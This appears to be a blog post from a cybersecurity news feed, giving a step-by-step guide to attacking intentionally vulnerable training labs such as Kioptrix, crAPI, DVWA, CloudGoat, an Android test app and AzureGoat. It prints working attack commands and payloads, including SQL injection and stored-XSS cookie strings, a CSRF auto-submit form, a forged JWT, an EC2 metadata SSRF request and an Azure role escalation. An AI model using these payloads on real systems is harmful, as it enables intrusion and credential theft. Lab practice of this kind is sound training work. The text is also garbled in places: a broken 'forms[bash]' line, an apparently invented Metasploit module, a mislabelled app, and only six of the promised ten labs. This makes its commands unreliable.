Top 10 Vulnerable Labs Every Aspiring Penetration Tester Must Exploit (Hands-On Guide) + Video

Listen to this Post

Featured Image

Introduction:

The gap between reading about cybersecurity vulnerabilities and actually exploiting them in a controlled environment is where real skill development happens. Hands-on practice with deliberately broken systems – from web applications and APIs to cloud infrastructure and mobile apps – transforms theoretical knowledge into actionable penetration testing expertise.

Learning Objectives:

  • Deploy and enumerate classic vulnerable virtual machines (Kioptrix, Metasploitable) to practice privilege escalation and exploitation
  • Identify and exploit modern API security flaws (crAPI, VAmPI) including broken object level authorization and excessive data exposure
  • Simulate cloud misconfiguration attacks across AWS, Azure, and GCP using CloudGoat, AzureGoat, and GCPGoat

You Should Know:

  1. Deploying and Attacking Kioptrix – Classic Linux Privilege Escalation

Kioptrix is an intentionally vulnerable Linux VM that teaches enumeration, service exploitation, and kernel privilege escalation. It mimics real-world legacy systems with outdated software.

Step‑by‑step guide (Linux attack machine, e.g., Kali):

 1. Identify target IP (use netdiscover or arp-scan)
sudo netdiscover -r 192.168.1.0/24

<ol>
<li>Scan open ports and services
nmap -sV -sC -O -p- 192.168.1.XXX</p></li>
<li><p>If port 80 is open, check web server (Apache/mod_ssl) – often mod_ssl vulnerability
searchsploit mod_ssl</p></li>
<li><p>Exploit using Metasploit (OpenFuck or Mod_ssl exploit)
msfconsole
msf6 > use exploit/unix/webapp/mod_ssl_openssl_sql_injection</p></li>
<li><p>After getting initial shell, enumerate OS, users, open ports
whoami; uname -a; cat /etc/passwd</p></li>
<li>Privilege escalation via kernel exploit (e.g., dirtycow or ptrace)
Download exploit to target (using wget on target if internet, or upload via Python server)
python3 -c 'import pty; pty.spawn("/bin/bash")'
Then run local kernel exploit

Windows alternative: Use PuTTY or PowerShell for SSH if target permits, but Kioptrix is Linux‑only. Practice Windows privilege escalation with Metasploitable3 instead.

  1. API Security Lab: crAPI – Attacking a Modern Vehicle API

crAPI (Completely Ridiculous API) exposes over 30 API vulnerabilities including BOLA, BFLA, mass assignment, and JWT misconfigurations. It’s essential for understanding OWASP API Top 10.

Step‑by‑step guide:

 Deploy crAPI (Docker required)
git clone https://github.com/OWASP/crAPI.git
cd crAPI
docker-compose up -d
 Access at http://localhost:8888

<ol>
<li>Enumerate API endpoints using Burp Suite or Postman
Intercept traffic – look for /api/ endpoints</p></li>
<li><p>Test for BOLA (Broken Object Level Authorization) – change order ID in request
Original: GET /api/vehicles/1234/location
Try: GET /api/vehicles/1235/location (another user's vehicle)</p></li>
<li><p>Using curl to exploit JWT alg none attack
Capture a JWT token from login, modify header: {"alg":"none"}
Send request with empty signature
curl -X GET "http://localhost:8888/api/me" -H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."</p></li>
<li><p>Mass assignment – add extra fields in POST /api/vehicle
curl -X POST "http://localhost:8888/api/vehicles" -H "Content-Type: application/json" -d '{"make":"Honda","model":"Civic","is_admin":true}'
  1. Web App Hacking on DVWA – SQLi, XSS, and CSRF Walkthrough

Damn Vulnerable Web Application (DVWA) offers configurable security levels. Start with low security to learn mechanics, then escalate to medium/high to practice bypasses.

Step‑by‑step guide (Linux):

 Install LAMP stack and DVWA
sudo apt update && sudo apt install apache2 mysql-server php php-mysqli
sudo systemctl start apache2
cd /var/www/html
sudo git clone https://github.com/digininja/DVWA.git
sudo chown -R www-data:www-data DVWA
 Configure config/config.inc.php with database credentials
 Visit http://localhost/DVWA/setup.php to create database

SQL Injection (Low security) – In User ID field, enter:
1' OR '1'='1' UNION SELECT user,password FROM users
 Use sqlmap for automated exploitation:
sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=xxx" --dbs

XSS (Stored) – In "Name" field, enter:
<script>alert(document.cookie)</script>

CSRF – Craft HTML page that auto-submits password change:
<html><body onload="document.forms[bash].submit()">

<form action="http://localhost/DVWA/vulnerabilities/csrf/" method="POST">
<input name="password_new" value="hacked">
<input name="password_conf" value="hacked">
<input name="Change" value="Change">
</form>

</body></html>
  1. CloudGoat – AWS Misconfiguration Exploitation (S3, IAM, EC2)

CloudGoat is Rhino Security Labs’ “vulnerable by design” AWS environment. It teaches real cloud attack paths like public S3 buckets, overprivileged IAM roles, and EC2 metadata abuse.

Step‑by‑step guide:

 Install prerequisite: Python3, pip, AWS CLI, and configured AWS account (free tier)
pip3 install cloudgoat
 Clone and configure
git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat

Deploy a scenario (e.g., 'ec2_ssrf')
./cloudgoat.py create ec2_ssrf
 Outputs: Access keys for vulnerable role

Attack simulation – assume compromised access key
export AWS_ACCESS_KEY_ID=AKIA...
export AWS_SECRET_ACCESS_KEY=...

<ol>
<li>Enumerate S3 buckets
aws s3 ls</p></li>
<li><p>Try to download bucket contents (if public)
aws s3 cp s3://vulnerable-bucket/secret.txt ./</p></li>
<li><p>Check EC2 instances and user data
aws ec2 describe-instances --region us-east-1
Look for user-data scripts that may contain hardcoded secrets</p></li>
<li><p>Exploit SSRF via metadata service (if compromised app on EC2)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
Use obtained temporary credentials to access other AWS services

Mitigation: Apply least-privilege IAM policies and restrict metadata service with IMDSv2

Windows/powerShell alternative: Install AWS Tools for PowerShell (Install-Module -Name AWSPowerShell) then use Get-S3Bucket, Get-EC2Instance.

5. Android Goat – Mobile Application Security Testing

Android Goat (and DIVA) provide deliberately vulnerable Android apps. Learn static/dynamic analysis, insecure data storage, root detection bypass, and inter-component communication attacks.

Step‑by‑step guide:

 Set up Android emulator (Android Studio) or rooted physical device
adb devices  Confirm device connected

Install Android Goat APK
wget https://github.com/oversecured/ovaa/releases/download/v1.0.0/ovaa.apk
adb install ovaa.apk

<ol>
<li>Static analysis using jadx (decompiler)
jadx ovaa.apk -d output_source
grep -r "password|secret|api_key" output_source/</p></li>
<li><p>Insecure logging – check logcat for sensitive data leaked by app
adb logcat | grep -i "password|token|credit"</p></li>
<li><p>Bypass root detection using Frida (dynamic instrumentation)
frida-ps -U  List processes
frida -U com.oversecured.ovaa -l bypass_root.js

Example Frida script bypass_root.js:
Java.perform(function() {
var RootDetection = Java.use("com.oversecured.ovaa.utils.RootDetection");
RootDetection.isDeviceRooted.implementation = function() { return false; };
});</p></li>
<li><p>Exploit insecure content provider – read arbitrary files
content query --uri content://com.example.provider/files --projection _data
  1. AzureGoat – Attacking Storage Accounts, Key Vaults, and Logic Apps

AzureGoat simulates misconfigurations such as publicly accessible blob storage, overly permissive RBAC, and managed identity abuse. Practice using Az PowerShell or Azure CLI.

Step‑by‑step guide (Linux or Windows):

 Install Azure CLI
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
az login --use-device-code

Deploy AzureGoat (follow repo instructions)
git clone https://github.com/ine-labs/AzureGoat.git
cd AzureGoat
./deploy.sh  Interactive deployment

Attack: Enumerate storage account containers anonymously
 Find public storage endpoint from deployment output
az storage container list --account-name vulnerablestorage --auth-mode key --connection-string "..."

Check for public read access
az storage container show-permission --name public-container --account-name vulnerablestorage

Download blobs without authentication (if public)
wget https://vulnerablestorage.blob.core.windows.net/public-container/secret.txt

Attack: Privilege escalation via over-assigned RBAC role
 List role assignments for a low-privilege user
az role assignment list --assignee "[email protected]"
 Then attempt to assign a higher role (if current role allows microsoft.authorization/roleassignments/write)
az role assignment create --assignee "[email protected]" --role "Contributor" --scope /subscriptions/xxx

Mitigation: Disable public blob access at storage account level, enforce RBAC least privilege

What Undercode Say:

  • Labs bridge theory and practice – You cannot learn penetration testing solely from books or videos. Each listed lab exposes real attacker thought processes: enumeration, exploitation, lateral movement, and privilege escalation.
  • Progressive skill building – Start with Kioptrix (Linux privesc), then web (DVWA), APIs (crAPI), mobile, and finally cloud (CloudGoat trio). This sequence ensures foundational skills before tackling distributed architectures.
  • Automate but understand – Using sqlmap, Metasploit, or Frida is efficient, but manual attempts (e.g., crafting SQLi payloads by hand) build deeper intuition. Always practice both ways.

Prediction:

As cloud-native and API-driven architectures dominate, traditional network pentesting labs will become less sufficient. Expect a surge in integrated labs that combine AWS/Azure misconfigurations with OWASP API Top 10 and supply chain vulnerabilities (e.g., vulnerable CI/CD pipelines). AI‑assisted pentesting tools will emerge, but hands-on lab proficiency will remain the gold standard for hiring – certifications alone won’t prove skill. The labs listed here are just the beginning; future practitioners must also practice Kubernetes attack paths (e.g., Katacoda scenarios) and GraphQL API abuse. Start today, because attackers already are.

▶️ Related Video (84% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Michael Eru – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky